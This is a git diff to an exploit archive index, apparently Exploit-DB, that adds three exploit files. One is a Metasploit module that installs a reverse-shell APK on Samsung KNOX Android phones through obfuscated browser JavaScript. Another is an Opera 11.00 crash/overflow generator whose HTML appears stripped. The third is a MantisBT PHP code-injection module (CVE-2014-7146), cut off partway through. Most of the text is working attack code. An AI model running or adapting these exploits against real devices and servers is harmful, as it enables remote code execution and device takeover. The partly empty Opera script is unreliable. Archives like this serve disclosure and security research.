diff --git a/files.csv b/files.csv
index 6b7f7a689..b42109311 100755
--- a/files.csv
+++ b/files.csv
@@ -31663,7 +31663,7 @@ id,file,description,date,author,platform,type,port
35143,platforms/php/webapps/35143.txt,"HotWeb Scripts HotWeb Rentals 'PageId' Parameter SQL Injection Vulnerability",2010-12-28,"non customers",php,webapps,0
35144,platforms/multiple/remote/35144.txt,"Appweb Web Server 3.2.2-1 Cross Site Scripting Vulnerability",2010-12-23,"Gjoko Krstic",multiple,remote,0
35145,platforms/php/webapps/35145.txt,"Pligg CMS 1.1.3 'range' Parameter SQL Injection Vulnerability",2010-12-27,Dr.NeT,php,webapps,0
-35146,platforms/php/webapps/35146.txt,"PHP 5.x - Bypass Disable Functions (via Shellshock)",2014-11-03,"Ryan King (Starfall)",php,webapps,0
+35146,platforms/php/webapps/35146.txt,"PHP 5.x Shellshock Exploit (bypass disable_functions)",2014-11-03,"Ryan King (Starfall)",php,webapps,0
35148,platforms/linux/remote/35148.txt,"IBM Tivoli Access Manager 6.1.1 for e-business Directory Traversal Vulnerability",2010-12-24,anonymous,linux,remote,0
35149,platforms/php/webapps/35149.txt,"LiveZilla 3.2.0.2 'Track' Module 'server.php' Cross Site Scripting Vulnerability",2010-12-27,"Ulisses Castro",php,webapps,0
35150,platforms/php/webapps/35150.php,"Drupal < 7.32 Pre Auth SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443
@@ -31767,6 +31767,7 @@ id,file,description,date,author,platform,type,port
35265,platforms/php/webapps/35265.php,"WordPress Recip.ly 1.1.7 'uploadImage.php' Arbitrary File Upload Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0
35266,platforms/php/webapps/35266.txt,"MyBB Forums 1.8.2 - Stored XSS Vulnerability",2014-11-17,"Avinash Thapa",php,webapps,0
35272,platforms/hardware/webapps/35272.txt,"ZTE ZXHN H108L - Authentication Bypass",2014-11-17,"Project Zero Labs",hardware,webapps,0
+35273,platforms/windows/remote/35273.html,"Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.1 Bypass (MS12-037)",2014-11-17,"ryujin & sickness",windows,remote,0
35274,platforms/php/webapps/35274.txt,"PHPFox - Stored XSS Vulnerability",2014-11-17,spyk2r,php,webapps,80
35275,platforms/xml/webapps/35275.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection",2014-11-17,"BGA Security",xml,webapps,80
35276,platforms/hardware/webapps/35276.txt,"ZTE ZXHN H108L - Authentication Bypass",2014-11-17,"Project Zero Labs",hardware,webapps,80
@@ -31774,3 +31775,21 @@ id,file,description,date,author,platform,type,port
35278,platforms/php/webapps/35278.txt,"Zoph 0.9.1 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",php,webapps,80
35279,platforms/osx/dos/35279.html,"Safari 8.0 / OS X 10.10 - Crash PoC",2014-11-17,w3bd3vil,osx,dos,0
35280,platforms/windows/remote/35280.txt,".NET Remoting Services Remote Command Execution",2014-11-17,"James Forshaw",windows,remote,0
+35282,platforms/android/remote/35282.rb,"Samsung Galaxy KNOX Android Browser RCE",2014-11-18,metasploit,android,remote,0
+35283,platforms/php/remote/35283.rb,"MantisBT XmlImportExport Plugin PHP Code Injection Vulnerability",2014-11-18,metasploit,php,remote,80
+35284,platforms/multiple/remote/35284.pl,"Opera Web Browser 11.00 'option' HTML Element Integer Overflow Vulnerability",2011-01-25,"C4SS!0 G0M3S",multiple,remote,0
+35285,platforms/php/webapps/35285.txt,"WordPress Feature Slideshow Plugin 1.0.6 \'src\' Parameter Cross Site Scripting Vulnerability",2011-01-24,"AutoSec Tools",php,webapps,0
+35286,platforms/php/webapps/35286.txt,"WordPress BezahlCode Generator Plugin 1.0 'gen_name' Parameter Cross Site Scripting Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0
+35287,platforms/php/webapps/35287.txt,"Powerhouse Museum Collection Image Grid 0.9.1.1 'tbpv_username' Parameter Cross Site Scripting Vulnerability",2011-01-24,"AutoSec Tools",php,webapps,0
+35288,platforms/php/webapps/35288.txt,"WordPress oQey-Gallery Plugin 0.2 'tbpv_domain' Parameter Cross Site Scripting Vulnerability",2011-01-24,"AutoSec Tools",php,webapps,0
+35289,platforms/php/webapps/35289.txt,"WordPress FCChat Widget Plugin 2.1.7 'path' Parameter Cross Site Scripting Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0
+35290,platforms/php/webapps/35290.txt,"SimpGB 1.49.2 'guestbook.php' Multiple Cross Site Scripting Vulnerabilities",2011-01-26,MustLive,php,webapps,0
+35291,platforms/php/webapps/35291.txt,"Vanilla Forums 2.0.16 'Target' Parameter Cross Site Scripting Vulnerability",2011-01-27,"YGN Ethical Hacker Group",php,webapps,0
+35292,platforms/php/webapps/35292.html,"vBSEO 3.2.2/3.5.2 Multiple Cross Site Scripting Vulnerabilities",2011-01-30,MaXe,php,webapps,0
+35293,platforms/php/webapps/35293.txt,"VirtueMart eCommerce Component 1.1.6 for Joomla! SQL Injection Vulnerability",2011-01-31,"Andrea Fabrizi",php,webapps,0
+35294,platforms/php/webapps/35294.txt,"Joomla! 'com_clan_members' Component 'id' Parameter SQL Injection Vulnerability",2011-02-01,FL0RiX,php,webapps,0
+35295,platforms/php/webapps/35295.txt,"Joomla Component 'com_frontenduseraccess' Local File Include Vulnerability",2011-02-01,wishnusakti,php,webapps,0
+35296,platforms/php/webapps/35296.txt,"eSyndiCat Directory Software 2.2/2.3 'preview' Parameter Cross Site Scripting Vulnerability",2011-01-30,"Avram Marius",php,webapps,0
+35297,platforms/php/webapps/35297.txt,"Moodle 2.0.1 'PHPCOVERAGE_HOME' Cross Site Scripting Vulnerability",2011-02-01,"AutoSec Tools",php,webapps,0
+35298,platforms/php/webapps/35298.txt,"TinyWebGallery 1.8.3 Cross Site Scripting and Local File Include Vulnerabilities",2011-02-01,"Yam Mesicka",php,webapps,0
+35300,platforms/php/webapps/35300.txt,"WordPress TagNinja Plugin 1.0 'id' Parameter Cross Site Scripting Vulnerability",2011-02-01,"AutoSec Tools",php,webapps,0
diff --git a/platforms/android/remote/35282.rb b/platforms/android/remote/35282.rb
new file mode 100755
index 000000000..8b0c3e25d
--- /dev/null
+++ b/platforms/android/remote/35282.rb
@@ -0,0 +1,162 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'digest/md5'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+ include Msf::Exploit::Remote::BrowserExploitServer
+
+ # Hash that maps payload ID -> (0|1) if an HTTP request has
+ # been made to download a payload of that ID
+ attr_reader :served_payloads
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Samsung Galaxy KNOX Android Browser RCE',
+ 'Description' => %q{
+ A vulnerability exists in the KNOX security component of the Samsung Galaxy
+ firmware that allows a remote webpage to install an APK with arbitrary
+ permissions by abusing the 'smdm://' protocol handler registered by the KNOX
+ component.
+
+ The vulnerability has been confirmed in the Samsung Galaxy S4, S5, Note 3,
+ and Ace 4.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [
+ 'Andre Moulu', # discovery and advisory
+ 'joev' # msf module
+ ],
+ 'References' => [
+ ['URL', 'http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html'],
+ ['OSVDB', '114590']
+ ],
+ 'Platform' => 'android',
+ 'Arch' => ARCH_DALVIK,
+ 'DefaultOptions' => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp' },
+ 'Targets' => [ [ 'Automatic', {} ] ],
+ 'DisclosureDate' => 'Nov 12 2014',
+ 'DefaultTarget' => 0,
+
+ 'BrowserRequirements' => {
+ :source => 'script',
+ :os_name => OperatingSystems::Match::ANDROID
+ }
+ ))
+
+ register_options([
+ OptString.new('APK_VERSION', [
+ false, "The update version to advertise to the client", "1337"
+ ])
+ ], self.class)
+
+ deregister_options('JsObfuscate')
+ end
+
+ def exploit
+ @served_payloads = Hash.new(0)
+ super
+ end
+
+ def apk_bytes
+ payload.encoded
+ end
+
+ def on_request_uri(cli, req)
+ if req.uri =~ /\/([a-zA-Z0-9]+)\.apk\/latest$/
+ if req.method.upcase == 'HEAD'
+ print_status "Serving metadata..."
+ send_response(cli, '', magic_headers)
+ else
+ print_status "Serving payload '#{$1}'..."
+ @served_payloads[$1] = 1
+ send_response(cli, apk_bytes, magic_headers)
+ end
+ elsif req.uri =~ /_poll/
+ vprint_debug "Polling #{req.qstring['id']}: #{@served_payloads[req.qstring['id']]}"
+ send_response(cli, @served_payloads[req.qstring['id']].to_s, 'Content-type' => 'text/plain')
+ elsif req.uri =~ /launch$/
+ send_response_html(cli, launch_html)
+ else
+ super
+ end
+ end
+
+ # The browser appears to be vulnerable, serve the exploit
+ def on_request_exploit(cli, req, browser)
+ print_status "Serving exploit..."
+ send_response_html(cli, generate_html)
+ end
+
+ def magic_headers
+ { 'Content-Length' => apk_bytes.length,
+ 'ETag' => Digest::MD5.hexdigest(apk_bytes),
+ 'x-amz-meta-apk-version' => datastore['APK_VERSION'] }
+ end
+
+ def generate_html
+ %Q|
+
+
+
+ |
+ end
+
+ def exploit_js
+ payload_id = rand_word
+
+ js_obfuscate %Q|
+
+ function poll() {
+ var xhr = new XMLHttpRequest();
+ xhr.open('GET', '_poll?id=#{payload_id}&d='+Math.random()*999999999999);
+ xhr.onreadystatechange = function(){
+ if (xhr.readyState == 4) {
+ if (xhr.responseText == '1') {
+ setTimeout(killEnrollment, 100);
+ } else {
+ setTimeout(poll, 1000);
+ setTimeout(enroll, 0);
+ setTimeout(enroll, 500);
+ }
+ }
+ };
+ xhr.onerror = function(){
+ setTimeout(poll, 1000);
+ setTimeout(enroll, 0);
+ };
+ xhr.send();
+ }
+
+ function enroll() {
+ var loc = window.location.href.replace(/[/.]$/g, '');
+ top.location = 'smdm://#{rand_word}?update_url='+
+ encodeURIComponent(loc)+'/#{payload_id}.apk';
+ }
+
+ function killEnrollment() {
+ top.location = "intent://#{rand_word}?program="+
+ "#{rand_word}/#Intent;scheme=smdm;launchFlags=268468256;end";
+ setTimeout(launchApp, 300);
+ }
+
+ function launchApp() {
+ top.location='intent:view#Intent;SEL;component=com.metasploit.stage/.MainActivity;end';
+ }
+
+ enroll();
+ setTimeout(poll,600);
+
+ |
+ end
+
+ def rand_word
+ Rex::Text.rand_text_alphanumeric(3+rand(12))
+ end
+end
\ No newline at end of file
diff --git a/platforms/multiple/remote/35284.pl b/platforms/multiple/remote/35284.pl
new file mode 100755
index 000000000..db8d98306
--- /dev/null
+++ b/platforms/multiple/remote/35284.pl
@@ -0,0 +1,34 @@
+source: http://www.securityfocus.com/bid/46003/info
+
+Opera Web Browser is prone to a remote integer-overflow vulnerability.
+
+Successful exploits will allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks will cause denial-of-service conditions.
+
+Opera 11.00 is vulnerable; other versions may also be affected.
+
+print "[*]Creating the Exploit\n"
+i = 0
+buf = "\n"
+
+while i<0x4141
+ buf += "\n"
+ i+=1
+end
+
+HTML =
+"\n"+
+"\n\n"+
+"\n\n"+
+"\n\n\n"+
+"\n\n\n\n\n"
+
+f = File.open("Exploit_opera_11.00.html","w")
+f.puts HTML
+f.close
+puts "\n\n\[*]File Created With Sucess"
+sleep(1)
+puts "[*]Go to my Site www.invasao.com.br!"
+sleep(1)
diff --git a/platforms/php/remote/35283.rb b/platforms/php/remote/35283.rb
new file mode 100755
index 000000000..11c3e4934
--- /dev/null
+++ b/platforms/php/remote/35283.rb
@@ -0,0 +1,290 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = GreatRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'MantisBT XmlImportExport Plugin PHP Code Injection Vulnerability',
+ 'Description' => %q{
+ This module exploits a post-auth vulnerability found in MantisBT versions 1.2.0a3 up to 1.2.17 when the Import/Export plugin is installed.
+ The vulnerable code exists on plugins/XmlImportExport/ImportXml.php, which receives user input through the "description" field and the "issuelink" attribute of an uploaded XML file and passes to preg_replace() function with the /e modifier.
+ This allows a remote authenticated attacker to execute arbitrary PHP code on the remote machine.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Egidio Romano', # discovery http://karmainsecurity.com
+ 'Juan Escobar ', # module development @itsecurityco
+ ],
+ 'References' =>
+ [
+ ['CVE', '2014-7146']
+ ],
+ 'Platform' => 'php',
+ 'Arch' => ARCH_PHP,
+ 'Targets' => [['Generic (PHP Payload)', {}]],
+ 'DisclosureDate' => 'Nov 8 2014',
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('USERNAME', [ true, 'Username to authenticate as', 'administrator']),
+ OptString.new('PASSWORD', [ true, 'Pasword to authenticate as', 'root']),
+ OptString.new('TARGETURI', [ true, 'Base directory path', '/'])
+ ], self.class)
+ end
+
+ def check
+ res = exec_php('phpinfo(); die();', true)
+
+ if res && res.body =~ /This program makes use of the Zend/
+ return Exploit::CheckCode::Vulnerable
+ else
+ return Exploit::CheckCode::Unknown
+ end
+ end
+
+ def do_login()
+ print_status('Checking access to MantisBT...')
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'login_page.php'),
+ 'vars_get' => {
+ 'return' => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import')
+ }
+ })
+
+ fail_with(Failure::NoAccess, 'Error accessing MantisBT') unless res && res.code == 200
+
+ session_cookie = res.get_cookies
+
+ print_status('Logging in...')
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'login.php'),
+ 'cookie' => session_cookie,
+ 'vars_post' => {
+ 'return' => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import'),
+ 'username' => datastore['username'],
+ 'password' => datastore['password'],
+ 'secure_session' => 'on'
+ }
+ })
+
+
+ fail_with(Failure::NoAccess, 'Login failed') unless res && res.code == 302
+
+ fail_with(Failure::NoAccess, 'Wrong credentials') unless res.redirection.to_s !~ /login_page.php/
+
+ "#{session_cookie} #{res.get_cookies}"
+ end
+
+ def upload_xml(payload_b64, rand_text, cookies, is_check)
+
+ if is_check
+ timeout = 20
+ else
+ timeout = 3
+ end
+
+ rand_num = Rex::Text.rand_text_numeric(1, 9)
+
+ print_status('Checking XmlImportExport plugin...')
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'plugin.php'),
+ 'cookie' => cookies,
+ 'vars_get' => {
+ 'page' => 'XmlImportExport/import'
+ }
+ })
+
+ unless res && res.code == 200
+ print_error('Error trying to access XmlImportExport/import page...')
+ return false
+ end
+
+ # Retrieving CSRF token
+ if res.body =~ /name="plugin_xml_import_action_token" value="(.*)"/
+ csrf_token = Regexp.last_match[1]
+ else
+ print_error('Error trying to read CSRF token')
+ return false
+ end
+
+ # Retrieving default project id
+ if res.body =~ /name="project_id" value="([0-9]+)"/
+ project_id = Regexp.last_match[1]
+ else
+ print_error('Error trying to read project id')
+ return false
+ end
+
+ # Retrieving default category id
+ if res.body =~ /name="defaultcategory">[.|\r|\r\n]*